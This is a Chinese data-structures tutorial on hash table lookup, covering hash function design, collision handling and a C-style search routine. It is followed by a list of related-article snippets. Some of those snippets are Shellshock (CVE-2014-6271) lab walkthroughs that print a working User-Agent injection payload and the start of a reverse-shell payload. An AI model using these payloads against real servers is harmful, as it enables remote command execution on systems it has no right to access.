Hash表查找

article/2025/9/17 16:50:12

HASH

定义

根据设定的哈希函数 H(key) 和所选中的处理冲突的方法,将一组关键字映象到一个有限的、地址连续的地址集 (区间) 上,并以关键字在地址集中的“象”作为相应记录在表中的存储位置,如此构造所得的查找表称之为“哈希表

HASH函数的构造

  • 构造原则
    • 函数本身便于计算
    • 计算出来的地址分布均匀,即对任一关键字k,f(k) 对应不同地址的概率相等,目的是尽可能减少冲突

直接定址法

  • 哈希函数为关键字的线性函数
    • H(key) = key
    • H(key) = a * key + b

  • 此法仅适合于:
    地址集合的大小 = = 关键字集合的大小
  • 优点:以关键码key的某个线性函数值为哈希地址,不会产生冲突
  • 缺点:要占用连续地址空间,空间效率低

数字分析法

  • 假设关键字集合中的每个关键字都是由 s 位数字组成 (u1, u2, …, us),分析关键字集中的全体, 并从中提取分布均匀的若干位或它们的组合作为地址
  • 此方法仅适合于:
    能预先估计出全体关键字的每一位上各种数字出现的频度

平方取中法

  • 以关键字的平方值的中间几位作为存储地址。求“关键字的平方值” 的目的是“扩大差别” ,同时平方值的中间各位又能受到整个关键字中各位的影响
  • 此方法适合于:
    关键字中的每一位都有某些数字重复出现频度很高的现象

折叠法

  • 将关键字分割成若干部分,然后取它们的叠加和为哈希地址。有两种叠加处理的方法:移位叠加间界叠加
  • 此方法适合于:
    关键字的数字位数特别多

除留余数法

  • Hash(key)=key mod p (p是一个整数)
    • p≤m (表长)
    • p 应为小于等于 m 的最大素数

为什么要对 p 加限制?

给定一组关键字为: 12, 39, 18, 24, 33, 21若取 p=9, 则他们对应的哈希函数值将为:
3, 3, 0, 6, 6, 3

可见,若 p 中含质因子 3, 则所有含质因子 3 的关键字均映射到“3 的倍数”的地址上,从而增加了“冲突”的可能

随机数法

  • H(key) = Random(key) (Random 为伪随机函数)
  • 此方法用于对长度不等的关键字构造哈希函数

考虑因素

  1. 执行速度(即计算哈希函数所需时间)
  2. 关键字的长度
  3. 哈希表的大小
  4. 关键字的分布情况
  5. 查找频率

采用何种构造哈希函数的方法取决于建表的关键字集合的情况
原则是使产生冲突的可能性降到尽可能地小

处理冲突的方法

1. 开放定址法

基本思想

  • 有冲突时就去寻找下一个空的哈希地址,只要哈希表足够大,空的哈希地址总能找到,并将数据元素存入

线性探测法

  • Hi=(Hash(key)+di) mod m ( 1≤i < m )
    其中:m为哈希表长度
    di 为增量序列 1,2,…m-1,且di=i

一旦冲突,就找下一个空地址存入

  • 优点:只要哈希表未被填满,保证能找到一个空地址单元存放有冲突的元素
  • 缺点:能使第i个哈希地址的同义词存入第i+1个地址,这样本应存入第i+1个哈希地址的元素变成了第i+2个哈希地址的同义词,……,产生“聚集”现象,降低查找效率

二次探测法

di = 12, -12, 22, -22, …±k2

伪随机探测法

Hi=(Hash(key)+di) mod m ( 1≤i < m )
其中:m为哈希表长度
di 为随机数

开放定址法建立哈希表步骤

  • 取数据元素的关键字key,计算其哈希函数值(地址)。若该地址对应的存储 空间还没有被占用,则将该元素存入;否则执行step2解决冲突
  • 根据选择的冲突处理方法,计算关键字key的下一个存储地址。若下一个存储地址仍被占用,则继续执行step2,直到找 到能用的存储地址为止

开放定址哈希表的存储结构

/* ------------- 开放定址哈希表的存储结构 ------------- */int hashsize[] = {997, ...};
typedef struct{ElemType* elem;int count;  // 当前数据元素个数int sizeindex;  // hashsize[sizeindex]为当前容量
} HashTable;#define SUCCESS 1
#define UNSUCCESS 0
#define DUPLICATE -1Status SearchHash(HashTable H, KeyType K, int &p, int &c){// 在开放定址哈希表H中查找关键码为K的记录p = Hash(K);  // 求得哈希地址while(H.elem[p].key != NULLKEY && !EQ(K, H.elem[p].key))collisiion(p, ++c);  // 求得下一探测地址pif(EQ(K, H.elem[p].key)) return SUCCESS;  // 查找成功,返回待查数据元素位置 pelse return UNSUCCESS;  // 查找不成功
}

2. 再HASH法

  • H2(key) 是另设定的一个哈希函数,它的函数值应和 m 互质

3. 链地址法

基本思想

  • 相同哈希地址的记录链成一单链表,m个哈希地址就设m个单链表,然后用用一个数组将m个单链表的表头指针存储起来,形成一个动态的结构

优点:

  • 非同义词不会冲突,无“聚集”现象
  • 链表上结点空间动态申请,更适合于表长不确定的情况

哈希表的查找

对于给定值 K,计算哈希地址 i = H(K)

  • 若 r[i] = NULL 则查找不成功
  • 若 r[i].key = K 则查找成功, 否则 “求下一地址 Hi” ,直至r[Hi] = NULL (查找不成功) 或r[Hi].key = K (查找成功) 为止

案例v01

  • 线性探测法解决冲突

案例v02

  • 链地址法处理冲突

哈希表查找的分析

从查找过程得知,哈希表查找的平均查找长度实际上并不等于零

决定哈希表查找的ASL的因素

  • 选用的哈希函数
  • 选用的处理冲突的方法
  • 哈希表饱和的程度,装载因子 α=n/m 值的大小(n—记录数,m—表的长度)

α 越大,表中记录数越多,说明表装得越满,发生冲突的可能性就越大,查找时比较次数就越多

  1. 对哈希表技术具有很好的平均性能,优于一些传统的技术
  2. 链地址法优于开地址法
  3. 除留余数法作哈希函数优于其它类型函数

哈希表应用举例

编译器对标识符的管理多是采用哈希表

  • 构造哈希函数的方法
    • 将标识符中的每个字符转换为一个非负整数
    • 将得到的各个整数组合成一个整数(可以将第一个、中间的和最后一个字符值加在一起,也可以将所有字符的值加起来)
    • 将结果数调整到0~M-1范围内,可以利用取模的方法,Ki%M(M为素数)

http://chatgpt.dhexx.cn/article/4lsjlyWD.shtml

相关文章

Hash表的简单实现

Hash表的定义 哈希表(Hash table&#xff0c;也叫散列表)&#xff0c;是根据关键字值(key)直接进行访问的数据结构&#xff0c;它通过把关键字值 映射到表中一个位置 (数组下标 )来直接访问&#xff0c;以加快查找 关键字值的速度。这个映射函数叫做 哈希(散列)函数&#xff0…

数据结构之Hash表(哈希表)

参考书籍&#xff1a;大话数据结构 一、Hash表定义 在记录的存储位置和它的关键字之间建立一个确定的对应关系f&#xff0c;使得每个关键字key对应一个存储位置。查找的时候&#xff0c;根据这个确定的对应关系找到给定值key的映射f(key)。 类似于中学数学中的函数&#xff0c;…

python hash表

在查找过程中不经过关键字的比较. 在待查的关键字值和它的存储位置之间建立一个确定的对应关系,则查找时不必再进行关键字值间的比较. 根据设定的哈希函数以及处理冲突的方法将查找表中各个数据元素存储在一段有限的连续空间中.即获得哈希表. 简单理解把key值通过函数映射为一…

hash表和hashmap

hash表和hashmap 一、哈希表 哈希(hash)表&#xff1a;在哈希表中进行添加&#xff0c;删除&#xff0c;查找等操作&#xff0c;性能十分之高&#xff0c;不考虑哈希冲突的情况下&#xff08;后面会探讨下哈希冲突的情况&#xff09;&#xff0c;仅需一次定位即可完成&#xf…

hash表(学习笔记)

hash表又叫散列表&#xff0c;是一种用来存放数据的数据结构。用于快速查询 hash表就是一种数组&#xff0c;输入关键字&#xff0c;通过hash函数得到&#xff0c;对应数据的下标。&#xff08;hash值就是下标&#xff09; hash函数根据关键字设计&#xff0c;主要原理&#…

Hash表(C语言)

一、简介: 哈希表又称散列表。哈希表存储的基本思想是&#xff1a;以数据表中的每个记录的关键字 key为自变量&#xff0c;通过一种函数H(key)计算出函数值。把这个值解释为一块连续存储空间&#xff08;即数组空间&#xff09;的单元地址&#xff08;即下标&#xff09;&…

什么是Hash表

1.定义 Hash&#xff08;散列/哈希&#xff09;&#xff0c;就是把任意长度的输入&#xff08;又叫做预映射&#xff0c; pre-image&#xff09;&#xff0c;通过散列算法&#xff0c;变换成固定长度的输出&#xff0c;该输出就是散列值。这种转换是一种压缩映射&#xff0c;也…

HASH表的创建(C语言)

HASH表的创建&#xff08;C语言&#xff09; 一、简介: 哈希表又称散列表。哈希表存储的基本思想是&#xff1a;以数据表中的每个记录的关键字 key为自变量&#xff0c;通过一种函数H(key)计算出函数值。把这个值解释为一块连续存储空间&#xff08;即数组空间&#xff09;的单…

java中HashMap与Hash表详解

转载至https://blog.csdn.net/u010297957/article/details/51974340 哈希算法&#xff0c;是一类算法&#xff1b;哈希表&#xff08;Hash Table&#xff09;是一种数据结构&#xff1b;哈希函数&#xff0c;是支撑哈希表的一类函数&#xff1b;Map是映射、地图的意思&#xff…

c实现Hash表

目录 一、简介 二、hash表结构图 三、结构定义 四、成员函数 初始化 销毁 辅助函数 辅助函数 添加 删除结点 查找 打印函数 测试 一、简介 使用crc16作为hash函数&#xff1b; 使用拉链法解决hash冲突; 简单的hash表; 二、hash表结构图 三、结构定义 1.hash函…

hash表的实现原理

hash表的实现原理 哈希表&#xff08;Hash table&#xff0c;也叫散列表&#xff09;&#xff0c;所谓hash表&#xff0c;就是以 键-值(key-indexed) 的形式存储的数据结构。可以根据key来快速的查找到value。也就是说&#xff0c;它通过把key值映射到表中一个位置来访问记录&a…

哈希表是什么

一.什么是哈希表 ​散列表&#xff08;Hash table&#xff0c;也叫哈希表&#xff09;&#xff0c;是根据键&#xff08;Key&#xff09;而直接访问在内存存储位置的数据结构。也就是说&#xff0c;它通过计算一个关于键值的函数&#xff0c;将所需查询的数据映射到表中一个位…

数据结构 Hash表(哈希表)

参考链接&#xff1a;数据结构&#xff08;严蔚敏&#xff09; 文章发布很久了&#xff0c;具体细节已经不清晰了&#xff0c;不再回复各种问题 文章整理自严蔚敏公开课视频 可以参考 https://www.bilibili.com/video/av22258871/ 如果链接失效 可以自行搜索 数据结构严蔚敏视频…

Linux Shell Shock漏洞利用和实战

漏洞介绍&#xff1a; Shellshock&#xff0c;又称Bashdoor&#xff0c;是在Unix中广泛使用的Bash shell中的一个安全漏洞&#xff0c;首次于2014年9月24日公开。许多互联网守护进程&#xff0c;如网页服务器&#xff0c;使用bash来处理某些命令&#xff0c;从而允许攻击者在易…

Bash(shellshock)

影响 漏洞影响&#xff1a;GNU Bash < 4.3 启动服务器 搭建&#xff1a;docker-compose up -d 查看&#xff1a;docker-compose ps 抵达网站 抓包拦截 User-Agent: () { :;};echo ; echo; echo $(/bin/ls /); 反弹shell&#xff1a;User-Agent:() { :; }; /bin/bash -i &g…

shell-awk

文章目录 一、com1.awk的作用和工作模式2.awk同其他文本处理程序的对比3.awk的正则 二、syntax1.basic format2.options&#xff1a;-F -fs 指定行中划分数据字段的字段分隔符。awk中默认的字段分隔符是任意的空白字符&#xff08;例如n个空格或n个制表符tab&#xff09;&#…

【靶场补充】项目十二补充(shellshock原理)

补充&#xff1a;关于项目12shellshock原理以及与CGI的利用原理 靶场WP地址 &#x1f525;系列专栏&#xff1a;Vulnhub百个项目渗透 &#x1f389;欢迎关注&#x1f50e;点赞&#x1f44d;收藏⭐️留言&#x1f4dd; &#x1f4c6;首发时间&#xff1a;&#x1f334;2022年9月…

[pwnable.kr]shellshock

题目大概是在提示我们跟shellshock有关 看到提供了bash&#xff0c; 先看看c源代码 #include <stdio.h> int main(){setresuid(getegid(), getegid(), getegid());setresgid(getegid(), getegid(), getegid());system("/home/shellshock/bash -c echo shock_me&quo…

vulhub漏洞复现-bash(CVE-2014-6271) shellshock-破壳漏洞

漏洞简介 破壳漏洞&#xff08;shellshock&#xff09;&#xff0c;也被称为bashdoor&#xff0c;是广泛使用的Unix shell中的一系列安全漏洞&#xff0c;其中第一个漏洞于2014年9月24日被披露。许多面向互联网的服务&#xff0c;如一些网络服务器部署&#xff0c;使用bash来处…

bash(CVE-2014-6271) shellshock-破壳漏洞复现

漏洞简介 破壳漏洞&#xff08;shellshock&#xff09;&#xff0c;也被称为bashdoor&#xff0c;是广泛使用的Unix shell中的一系列安全漏洞&#xff0c;其中第一个漏洞于2014年9月24日被披露。许多面向互联网的服务&#xff0c;如一些网络服务器部署&#xff0c;使用bash来处…